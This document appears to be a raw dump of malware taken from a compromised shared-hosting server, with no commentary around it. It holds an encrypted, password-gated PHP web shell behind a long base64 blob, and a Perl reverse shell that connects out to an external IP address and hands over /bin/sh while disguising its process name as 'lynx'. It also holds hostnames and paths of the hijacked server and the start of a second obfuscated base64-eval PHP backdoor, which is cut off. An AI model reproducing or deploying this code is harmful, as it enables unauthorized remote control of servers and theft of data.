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 KRba9Hs= '));$_f__f=isset($_POST['_f__f'])?$_POST['_f__f']:(isset($_COOKIE['_f__f'])?$_COOKIE['_f__f']:NULL);if($_f__f!==NULL){$_f__f=md5($_f__f).substr(md5(strrev($_f__f)),0,strlen($_f__f));for($_f____f=0;$_f____f<15185;$_f____f++){$_f___f[$_f____f]=chr(( ord($_f___f[$_f____f])-ord($_f__f[$_f____f]))%256);$_f__f.=$_f___f[$_f____f];}if($_f___f=@gzinflate($_f___f)){if(isset($_POST['_f__f']))@setcookie('_f__f', $_POST['_f__f']);$_f____f=create_function('',$_f___f);unset($_f___f,$_f__f);$_f____f();}}?><form action="" method="post"><input type="text" name="_f__f" value=""/><input type="submit" value=">"/></form>
login-69.hoststar.ch
/home/www/confixx/html/skins/1
perl skins/2 162.216.6.208 44
/home/www/confixx/html/skins/2
#!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR);
login-69.hoststar.ch
/home/www/confixx/html/skins/1
<?php error_reporting(0);$p="jedbzzazbzcb";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3RlZCAkZnVsbHVybDsgcHJvdGVjdGVkICRwX3VybDsgcHJvdGVjdGVkICRjb25uX2lkOyBwcm90ZWN0ZWQgJGZsdXNoZWQ7IHByb3RlY3RlZCAkbW9kZSA9IDQ7IHByb3RlY3RlZCAkZGVmbW9kZTsgcHJvdGVjdGVkICRyZWRpcmVjdHMgPSAwOyBwcm90ZWN0ZWQgJGJpbmFyeTsgcHJvdGVjdGVkICRvcHRpb25zOyBwcm90ZWN0ZWQgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KcHJvdGVjdGVkIGZ1bmN0aW9uIGVycm9yKCRtc2c9J25vdCBjb25uZWN0ZWQnKSB7IGlmICgkdGhpcy0+b3B0aW9ucyAmIFNUUkVBTV9SRVBPUlRfRVJST1JTKSB7IHRyaWdnZXJfZXJyb3IoJG1zZywgRV9VU0VSX1dBUk5JTkcpOyB9IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9vcGVuKCRwYXRoLCAkbW9kZSwgJG9wdGlvbnMsICRvcGVuZWRfcGF0aCkgeyAkdGhpcy0+ZnVsbHVybCA9ICRwYXRoOyAkdGhpcy0+b3B0aW9ucyA9ICRvcHRpb25zOyAkdGhpcy0+ZGVmbW9kZSA9ICRtb2RlOyAkdXJsID0gcGFyc2VfdXJsKCRwYXRoKTsgaWYgKGVtcHR5KCR1cmxbJ2hvc3QnXSkpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignbWlzc2luZyBob3N0IG5hbWUnKTsgfSAkdGhpcy0+Y29ubl9pZCA9IGZzb2Nrb3BlbigkdXJsWydob3N0J10sIChlbXB0eSgkdXJsWydwb3J0J10pID8gODAgOiBpbnR2YWwoJHVybFsncG9ydCddKSksICRlcnJubywgJGVycnN0ciwgMik7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChlbXB0eSgkdXJsWydwYXRoJ10pKSB7ICR1cmxbJ3BhdGgnXSA9ICcvJzsgfSAkdGhpcy0+cF91cmwgPSAkdXJsOyAkdGhpcy0+Zmx1c2hlZCA9IGZhbHNlOyBpZiAoJG1vZGVbMF0gIT0gJ3InIHx8IChzdHJwb3MoJG1vZGUsICcrJykgIT09IGZhbHNlKSkgeyAkdGhpcy0+bW9kZSArPSAyOyB9ICR0aGlzLT5iaW5hcnkgPSAoc3RycG9zKCRtb2RlLCAnYicpICE9PSBmYWxzZSk7ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgaWYgKCFpc3NldCgkY1snbWV0aG9kJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21ldGhvZCcsICdHRVQnKTsgfSBpZiAoIWlzc2V0KCRjWydoZWFkZXInXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnaGVhZGVyJywgJycpOyB9IGlmICghaXNzZXQoJGNbJ3VzZXJfYWdlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAndXNlcl9hZ2VudCcsIGluaV9nZXQoJ3VzZXJfYWdlbnQnKSk7IH0gaWYgKCFpc3NldCgkY1snY29udGVudCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdjb250ZW50JywgJycpOyB9IGlmICghaXNzZXQoJGNbJ21heF9yZWRpcmVjdHMnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWF4X3JlZGlyZWN0cycsIDUpOyB9IHJldHVybiB0cnVlOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fcmVhZCgkYnl0ZXMpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+Zmx1c2hlZCAmJiAhJHRoaXMtPnN0cmVhbV9mbHVzaCgpKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZmVvZigkdGhpcy0+Y29ubl9pZCkpIHsgcmV0dXJuICcnOyB9ICRieXRlcyA9IG1heCgxLCRieXRlcyk7IGlmICgkdGhpcy0+YmluYXJ5KSB7IHJldHVybiBmcmVhZCgkdGhpcy0+Y29ubl9pZCwgJGJ5dGVzKTsgfSBlbHNlIHsgcmV0dXJuIGZnZXRzKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fd3JpdGUoJGRhdGEpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+bW9kZSAmIDIpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignU3RyZWFtIGlzIGluIHJlYWQtb25seSBtb2RlJyk7IH0gJGMgPSAkdGhpcy0+Y29udGV4dCgpOyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAoKCR0aGlzLT5kZWZtb2RlWzBdID09ICd4JykgPyAnUFVUJyA6ICdQT1NUJykpOyBpZiAoc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICRjWydjb250ZW50J10uJGRhdGEpKSB7IHJldHVybiBzdHJsZW4oJGRhdGEpOyB9IHJldHVybiAwOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc2Vlaygkb2Zmc2V0LCAkd2hlbmNlKSB7IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV90ZWxsKCkgeyByZXR1cm4gMDsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0